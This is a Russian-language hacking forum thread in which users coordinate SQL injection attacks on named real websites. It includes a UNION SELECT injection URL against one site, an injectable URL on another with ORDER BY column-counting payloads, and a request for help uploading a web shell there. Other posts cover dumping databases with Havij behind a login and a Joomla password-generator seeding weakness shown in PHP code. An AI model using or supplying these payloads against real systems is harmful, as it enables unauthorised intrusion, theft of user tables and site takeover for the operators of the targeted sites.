Старый 05.04.2012, 16:07   #1911
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Consistent там нет никакого фильтра, а БД это не только MySql
Lostnull эээ?
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 05.04.2012, 17:02   #1912
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Jokester Извиняйте, мозг неправильно сработал, при подстановке () 500 ошибка, подумал фильтр, пересмотрел понял, что тупанул. Пришел к выводу блайнд мс акцесс.
Consistent http://www.french-union.com/Menu/detail_visiteur.asp?id=18810+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24+from+MSysAccessObjects%16
Lostnull вне форума   Ответить с цитированием
Старый 06.04.2012, 12:55   #1913
Agama
 
Регистрация: 05.04.2012
Сообщений: 4
Репутация: 0
По умолчанию

to Raz0r
Цитата:
Сообщение от Raz0r Посмотреть сообщение
из-за вызова mt_srand(), в 1.5.26 его убрали

вовсе нет, в PHP 5.2.1 изменилась реализация алгоритма Mersenne Twister, но на подобные уязвимости это никак не влияет.
там именно mt_rand()

Код:
	
function genRandomPassword($length = 8)
	       {
		$salt = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
		$len = strlen($salt);
		$makepass = '';

		for ($i = 0; $i < $length; $i ++) {
			$makepass .= $salt[mt_rand(0, $len -1)];
		}

		return $makepass;
	}
не могу понять как её можно использовать в более поздних версиях PHP

PS Вашу статью 2008 года читал, мануал по функции тоже читал. Собственно из-за всего этого материала и отписал пост выше.
Agama вне форума   Ответить с цитированием
Старый 06.04.2012, 13:03   #1914
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Всем огромное спасибо за помощь. Разбираюсь. И еще вопрос, чем можно сдампить, если скуля после авторизации. Нужна поддержка кукисов. Хавиж не может зацепить ее почему то.
Consistent вне форума   Ответить с цитированием
Старый 06.04.2012, 13:54   #1915
Agama
 
Регистрация: 05.04.2012
Сообщений: 4
Репутация: 0
По умолчанию

в бесплатной не работает, надо покупать ))
Agama вне форума   Ответить с цитированием
Старый 06.04.2012, 15:02   #1916
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

Цитата:
там именно mt_rand()
это код из Joomla 1.5.25, в более ранних версиях такой:
PHP код:
function genRandomPassword($length 8)
 {
 
$salt "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
 
$len strlen($salt);
 
$makepass '';
 
$stat = @stat(__FILE__); // <--
 
if(empty($stat) || !is_array($stat)) $stat = array(php_uname()); // <--
 
mt_srand(crc32(microtime() . implode('|'$stat))); // <--
 
for ($i 0$i $length$i ++) {
 
$makepass .= $salt[mt_rand(0$len -1)];
 }
 
return 
$makepass;
 } 
Уязвимость именно в наличии mt_srand() (т.е. в Joomla < 1.5.25), так как передаваемый сид ненадежен.
На самом деле, сомневаюсь, что ее действительно можно использовать, так как условия очень суровые:
  • необходим локальный доступ к файлу с данным кодом (/libraries/joomla/user/helper.php), чтобы получить результат stat() для этого файла
  • брут microtime()
Еще раз замечу, версия PHP здесь не играет значения.
Raz0r вне форума   Ответить с цитированием
Старый 06.04.2012, 15:37   #1917
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Цитата:
Сообщение от Agama Посмотреть сообщение
в бесплатной не работает, надо покупать ))
У меня лицензия. Говорю же, не может он её зацепить.
Consistent вне форума   Ответить с цитированием
Старый 07.04.2012, 03:31   #1918
moob
 
Регистрация: 07.04.2012
Сообщений: 3
Репутация: 0
По умолчанию

www.bonide.com/products/category.php?category_id=1'
помогите подобрать кол-во столбцов:
по стандарту не хочет определятся, а Havij определяет.
и помогите разобраться как сюда залить шелл.
moob вне форума   Ответить с цитированием
Старый 07.04.2012, 07:57   #1919
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Цитата:
Сообщение от moob
по стандарту не хочет определятся
Что за стандарт, по которому не хочет определяться?
1'order+by+11--+
1'order+by+12--+
M_script вне форума   Ответить с цитированием
Старый 07.04.2012, 09:43   #1920
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Lostnull таблицу с юзерами нашел?
durito вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot